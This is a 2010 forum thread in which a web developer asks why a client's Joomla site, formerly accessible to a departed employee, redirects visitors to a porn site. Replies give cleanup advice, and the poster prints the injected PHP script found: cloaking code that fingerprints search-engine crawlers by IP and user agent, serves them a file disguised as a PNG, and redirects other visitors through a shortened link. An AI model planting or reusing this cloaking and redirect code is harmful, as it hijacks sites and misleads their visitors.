Dealing with an ex employee

Dealing with an ex employee

Post by Code-Geek on Fri Jan 22, 2010 11:34 pm
([msg=33759]see Dealing with an ex employee[/msg])

So guys and gals..
Lets say I have this ex employee that had ftp and admin access to my joomla website...
Now when people click some of the links on my site, it sends me to pornhub.com or something.

Like my google translate will open up and show this
Image

any ideas on how this could have been done, please let me know.

For now.. I'll be working on it.
Code-Geek
New User
New User
 
Posts: 2
Joined: Fri Jan 22, 2010 11:19 pm
Blog: View Blog (0)


Re: Dealing with an ex employee

Post by Goatboy on Sat Jan 23, 2010 12:27 am
([msg=33760]see Re: Dealing with an ex employee[/msg])

Just taking a shot in the dark here, but might it have something to do with his FTP AND ADMIN ACCESS?

Change the password, first off. Delete his account if you have not already. Look for any recent changes to other accounts. They might have been compromised. Next, scan the links in question to see where they lead, and fix them. Look for any redirect scripts in your pages. This may take a while, but it needs to be done. As a final measure, I'd suggest making backups of your site and store them offline. This should make recovery easier in the future.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2822
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: Dealing with an ex employee

Post by sanddbox on Sat Jan 23, 2010 12:49 am
([msg=33761]see Re: Dealing with an ex employee[/msg])

Code-Geek wrote:I have this ex employee that had ftp and admin access


Gee, I can't think of anything!
Image

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat
User avatar
sanddbox
Expert
Expert
 
Posts: 2331
Joined: Sat Jul 04, 2009 5:20 pm
Blog: View Blog (0)


Re: Dealing with an ex employee

Post by Code-Geek on Sat Jan 23, 2010 12:57 am
([msg=33763]see Re: Dealing with an ex employee[/msg])

lol this isn't actually my company..
Someone who hired me..
But yes they removed his ftp and admin access as soon as they figured that out..
Sorry I didn't clarify.
Thanks for the input though.

BTW.. after getting the entire site downloaded and sifting through tons of code, I found this script.

Code: Select all
<?php



$host=$_SERVER['HTTP_HOST'];

$agent=$_SERVER['HTTP_USER_AGENT'];





    $server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];

    $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];

    $server_referer = @$_SERVER['HTTP_REFERER'];

    $server_host = @$_SERVER['HTTP_HOST'];

    $server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];

    $server_remote_addr = @$_SERVER['REMOTE_ADDR'];

    $server_query_string = @$_SERVER['QUERY_STRING'];

    $server_signature = @$_SERVER['SERVER_SIGNATURE'];

    $server_request = @$_SERVER['REQUEST_URI'];



function detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$server_referer,$enable_logging){

    $stop_ips_masks = array(

        "66\.249\.[6-9][0-9]\.[0-9]+",    // Google    NetRange:   66.249.64.0 - 66.249.95.255

        "74\.125\.[0-9]+\.[0-9]+",        // Google     NetRange:   74.125.0.0 - 74.125.255.255

        "65\.5[2-5]\.[0-9]+\.[0-9]+",    // MSN        NetRange:   65.52.0.0 - 65.55.255.255,

        "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255

        "67\.195\.[0-9]+\.[0-9]+",        // Yahoo#2    NetRange:   67.195.0.0 - 67.195.255.255

        "72\.30\.[0-9]+\.[0-9]+",        // Yahoo#3    NetRange:   72.30.0.0 - 72.30.255.255

        "38\.[0-9]+\.[0-9]+\.[0-9]+",     // Cuill:     NetRange:   38.0.0.0 - 38.255.255.255

        "93\.172\.94\.227",                // MacFinder

        "212\.100\.250\.218",            // Wells Search II

        "71\.165\.223\.134",            // Indy Library

        "70\.91\.180\.25",

        "65\.93\.62\.242",

        "74\.193\.246\.129",

        "213\.144\.15\.38",

        "195\.92\.229\.2",

        "70\.50\.189\.191",

        "218\.28\.88\.99",

        "165\.160\.2\.20",

        "89\.122\.224\.230",

        "66\.230\.175\.124",

        "218\.18\.174\.27",

        "65\.33\.87\.94",

        "67\.210\.111\.241",

        "81\.135\.175\.70",

        "64\.69\.34\.134",

        "89\.149\.253\.169",



        "64\.233\.1[6-8][1-9]\.[0-9]+",

        "64\.233\.19[0-1]\.[0-9]+",

        //google from iplists

        "209\.185\.108\.[0-9]+",

        "209\.185\.253\.[0-9]+",

        "209\.85\.238\.[0-9]+",

        "216\.239\.33\.9[6-9]",

        "216\.239\.37\.9[8-9]",

        "216\.239\.39\.9[8-9]",

        "216\.239\.41\.9[6-9]",

        "216\.239\.45\.4",

        "216\.239\.46\.[0-9]+",

        "216\.239\.51\.9[6-9]",

        "216\.239\.53\.9[8-9]",

        "216\.239\.57\.9[6-9]",

        "216\.239\.59\.9[8-9]",

        "216\.33\.229\.163",

        "64\.233\.173\.[0-9]+",

        "64\.68\.8[0-9]\.[0-9]+",

        "64\.68\.9[0-2]\.[0-9]+",

        "72\.14\.199\.[0-9]+",

        "8\.6\.48\.[0-9]+",

        //google from iplists

// 10.0.0.0 - 10.255.255.255 ian:        "207\.211\.40\.82",

        "67\.162\.158\.146",

        "66\.255\.53\.123",

        "24\.200\.208\.112",

        "129\.187\.148\.240",

        "129\.187\.148\.244",

        "199\.126\.151\.229",

        "118\.124\.32\.193",

        "89\.149\.217\.191"



    );

    $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawl", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress",'Charlotte','wwwster','Python','urllib','perl','libwww','lynx','Twiceler','rambler','yandex');



    $server_user_agent = preg_replace("|User\.Agent\:[\s ]?|i", "", @$server_user_agent);



    $is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";

    foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("$stop_ip_mask", $server_ip)) {

        $is_human = false;  break;

    }

    if($is_human) foreach($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$server_user_agent) !== false){

        $is_human = false;  break;

    }

    if($is_human and !eregi("^[a-zA-Z]{5,}", @$server_user_agent)) {

        $is_human = false;

    }



    if($is_human and strlen($server_user_agent)<=11) {

        $is_human = false;

    }



    if(stristr($server_referer,$server_query_string)) {

        $is_human = false;

    }



    return $is_human;

}



@$is_human = @detectBot($server_user_agent,$server_ip,$my_url_for_log,$server_query_string,$server_referer,$enable_logging);

if (@$is_human==false)

{

include "icon2_old.png.php";

exit;

}

if (preg_match('/porn/', $_SERVER["HTTP_REFERER"]) > 0)

{

header("Location: http://bit.ly/7IDKb0");

exit;  }



?>
Code-Geek
New User
New User
 
Posts: 2
Joined: Fri Jan 22, 2010 11:19 pm
Blog: View Blog (0)


Re: Dealing with an ex employee

Post by Goatboy on Sat Jan 23, 2010 1:25 am
([msg=33764]see Re: Dealing with an ex employee[/msg])

Did you even read that code? 99% of the lines detect spiders, and the second-to-last one redirects to PornTube. Remove the header line and it's fixed.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2822
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)



Return to Web Design

Who is online

Users browsing this forum: No registered users and 0 guests